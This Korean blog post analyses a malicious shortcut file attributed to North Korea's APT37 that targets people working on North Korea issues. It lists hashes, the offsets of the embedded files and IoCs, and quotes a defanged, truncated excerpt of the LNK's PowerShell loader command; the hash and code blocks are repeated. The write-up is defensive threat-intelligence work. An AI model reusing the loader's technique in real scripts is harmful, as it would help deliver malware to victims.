대북 관계자를 타켓팅 하는 APT 37(Reaper,리퍼)에서 만든 악성코드-김X성강의자료.lnk(2024.12.06)
Contents
오늘은 ROKRAT 대북 관계자를 타켓팅 하는 APT 37(Reaper,리퍼)에서 만든 악성코드-김X성강의자료.lnk(2024.12.06)에 대해 알아보겠습니다. 해당 APT 조직들은 해외 공공 및 민간 부문을 표적으로 삼는 데 중점 두고 있으며 APT 37, Reaper,Reaper Group,Red Eyes,Ricochet Chollima, ScarCruft,TA-RedAnt,Venus 121 으로 불리기도 하는 하나도 존경하고 경애하지 않고 자유대한민국의 전혀 도움되지 않는 북한의 정찰총국 산하 APT37 에서 만든 악성코드이며 개인적으로도 해당 글을 쓰는 시점인 2024.12.06 에 기준으로 적어 봅니다. 아마도 私見으로는 현재 비상계엄이니 대통령 탄핵이니 국가가 혼란한 상황에서 유포되는 시점이라서. 무엇가 있지 않나 싶습니다. 어디까지나 사견…. 일단 해당 악성코드는 악성코드 안에 PDF,bat,DAT 파일들이 존재하는 것이 특징입니다.
해쉬
파일명: 김X성강의자료.lnk
사이즈:57,681,487 Bytes
MD5:2fa8f5f95577db335e649d5361c845b0
SHA-1:c8bb4f1ebeafd00cc6b73e2cf265c18fd8660df7
SHA-256:d9e3eba6067eec0aa32214b2a9811f4b579b66b34fe4e5bff4d754102dffdb91
해당 악성코드에 포함된 파일들 위치
PDF:0x0000110C 오프셋~0x0039A3DD
huawei.bat:0x00474CAC 오프셋~0x00000143
oppo.dat:0x00474679 오프셋 ~ 0x00000633
악성코드 파워셀 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k (f)or /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsP(o)
0werShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$dirPath
= Get-Location; if($dirP(a)th -Match 'System32' -or $dirPath -Match
'Program Files') {$dirPath = '%temp%'};$exs=@('(.0lnk');$l(n)kPath
= Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -i(n) $exs}
| where-object {$_.length -eq 0x037026(4)F} | Select-Object -ExpandProperty …
해쉬
파일명: 김X성강의자료.lnk
사이즈:57,681,487 Bytes
MD5:2fa8f5f95577db335e649d5361c845b0
SHA-1:c8bb4f1ebeafd00cc6b73e2cf265c18fd8660df7
SHA-256:d9e3eba6067eec0aa32214b2a9811f4b579b66b34fe4e5bff4d754102dffdb91
해당 악성코드에 포함된 파일들 위치
PDF:0x0000110C 오프셋~0x0039A3DD
huawei.bat:0x00474CAC 오프셋~0x00000143
oppo.dat:0x00474679 오프셋 ~ 0x00000633
악성코드 파워셀 코드
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k (f)or /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsP(o)
0werShell\v1.0\*rshell(.)exe /s /b /od') do call %a "$dirPath
= Get-Location; if($dirP(a)th -Match 'System32' -or $dirPath -Match
'Program Files') {$dirPath = '%temp%'};$exs=@('(.0lnk');$l(n)kPath
= Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -i(n) $exs}
| where-object {$_.length -eq 0x037026(4)F} | Select-Object -ExpandProperty …
IoC
c8bb4f1ebeafd00cc6b73e2cf265c18fd8660df7
d9e3eba6067eec0aa32214b2a9811f4b579b66b34fe4e5bff4d754102dffdb91
2fa8f5f95577db335e649d5361c845b0
d9e3eba6067eec0aa32214b2a9811f4b579b66b34fe4e5bff4d754102dffdb91
2fa8f5f95577db335e649d5361c845b0